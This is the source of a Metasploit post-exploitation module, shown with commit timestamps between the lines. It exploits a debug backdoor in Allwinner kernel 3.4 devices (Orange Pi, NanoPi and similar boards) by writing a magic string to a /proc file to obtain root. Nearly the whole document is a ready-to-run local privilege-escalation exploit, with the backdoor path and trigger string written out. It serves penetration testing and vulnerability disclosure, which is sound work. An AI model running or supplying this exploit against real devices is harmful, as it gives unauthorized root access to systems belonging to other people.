2016-05-13 02:18:43 +00:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
2016-05-18 01:58:32 +00:00
|
|
|
require "msf/core"
|
2016-05-13 02:18:43 +00:00
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Post
|
|
|
|
|
include Msf::Post::File
|
|
|
|
|
include Msf::Post::Linux::Priv
|
|
|
|
|
|
2016-05-24 02:59:44 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
2016-05-18 23:08:01 +00:00
|
|
|
"Name" => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
|
2016-05-18 01:58:32 +00:00
|
|
|
"Description" => %q{
|
2016-05-18 02:07:33 +00:00
|
|
|
This module attempts to exploit a debug backdoor privilege escalation in
|
|
|
|
|
Allwinner SoC based devices.
|
|
|
|
|
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
|
|
|
|
|
Vulnerable OS: all OS images available for Orange Pis,
|
|
|
|
|
any for FriendlyARM's NanoPi M1,
|
|
|
|
|
SinoVoip's M2+ and M3,
|
|
|
|
|
Cuebietech's Cubietruck +
|
|
|
|
|
Linksprite's pcDuino8 Uno
|
|
|
|
|
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
|
2016-05-13 02:18:43 +00:00
|
|
|
},
|
2016-05-18 01:58:32 +00:00
|
|
|
"License" => MSF_LICENSE,
|
|
|
|
|
"Author" =>
|
2016-05-13 02:18:43 +00:00
|
|
|
[
|
2016-05-18 01:58:32 +00:00
|
|
|
"h00die <mike@stcyrsecurity.com>", # Module
|
|
|
|
|
"KotCzarny" # Discovery
|
2016-05-13 02:18:43 +00:00
|
|
|
],
|
2016-05-18 01:58:32 +00:00
|
|
|
"Platform" => [ "android", "linux" ],
|
|
|
|
|
"DisclosureDate" => "Apr 30 2016",
|
|
|
|
|
"References" =>
|
2016-05-13 02:18:43 +00:00
|
|
|
[
|
2016-05-18 01:58:32 +00:00
|
|
|
[ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
|
2016-05-24 02:59:44 +00:00
|
|
|
[ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \
|
|
|
|
|
"https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
|
2016-05-18 01:58:32 +00:00
|
|
|
[ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
|
2016-05-13 02:18:43 +00:00
|
|
|
],
|
2016-05-18 01:58:32 +00:00
|
|
|
"SessionTypes" => [ "shell", "meterpreter" ]
|
2016-05-13 02:18:43 +00:00
|
|
|
))
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def run
|
2016-05-18 01:58:32 +00:00
|
|
|
backdoor = "/proc/sunxi_debug/sunxi_debug"
|
2016-05-13 02:18:43 +00:00
|
|
|
if file_exist?(backdoor)
|
2016-05-18 01:58:32 +00:00
|
|
|
vprint_good "Backdoor found, exploiting."
|
|
|
|
|
cmd_exec("echo rootmydevice > #{backdoor}")
|
2016-05-13 02:18:43 +00:00
|
|
|
if is_root?
|
2016-05-18 01:58:32 +00:00
|
|
|
print_good "Privilege Escalation Successful"
|
2016-05-23 21:36:50 +00:00
|
|
|
report_vuln(
|
2016-05-24 05:57:37 +00:00
|
|
|
host: session.session_host,
|
|
|
|
|
name: self.name,
|
|
|
|
|
refs: self.references,
|
|
|
|
|
info: 'Escalated to root shell via Allwinner backdoor'
|
2016-05-13 02:18:43 +00:00
|
|
|
)
|
|
|
|
|
else
|
2016-05-18 01:58:32 +00:00
|
|
|
print_error "Privilege Escalation FAILED"
|
2016-05-13 02:18:43 +00:00
|
|
|
end
|
|
|
|
|
else
|
2016-05-18 01:58:32 +00:00
|
|
|
print_error "Backdoor #{backdoor} not found."
|
2016-05-13 02:18:43 +00:00
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
end
|
